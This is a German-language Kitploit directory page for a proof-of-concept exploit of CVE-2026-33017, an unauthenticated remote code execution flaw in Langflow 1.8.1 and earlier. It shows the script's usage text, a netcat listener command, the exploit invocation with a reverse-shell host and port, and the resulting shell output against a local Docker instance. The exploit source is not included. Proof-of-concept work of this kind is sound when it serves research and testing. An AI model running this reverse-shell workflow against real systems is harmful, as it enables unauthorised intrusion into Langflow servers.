Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/masterwok/poc-cve-2026-33017
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubmasterwok/poc-cve-2026-33017

PoC-CVE-2026-33017

Proof-of-Concept-Exploit für CVE-2026-33017 (Langflow <= 1.8.1).

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC: CVE-2026-33017

Langflow <= 1.8.1 ist anfällig für eine entfernte, nicht authentifizierte RCE (https://nvd.nist.gov/vuln/detail/CVE-2026-33017)


Verwendung

root@kitploit:~
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target

PoC-Exploit: CVE-2026-33017

positional arguments:
  target         Ziel-Hostname

options:
  -h, --help     Zeigt diese Hilfemeldung an und beendet das Programm
  --lhost LHOST  IP-Adresse des Ziels für die Reverse Shell
  --lport LPORT  Port des Ziels für die Reverse Shell

Beispiel

root@kitploit:~
# Docker-Instanz erstellen
docker run -d -p 7860:7860 langflowai/langflow:1.8.1

# Listener starten
nc -lnvp 4444

# Exploit starten
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444

# Reverse Shell sollte im Listener eintreffen
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux

Dieses Projekt dient ausschließlich Bildungs- und Forschungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.

Tool herunterladen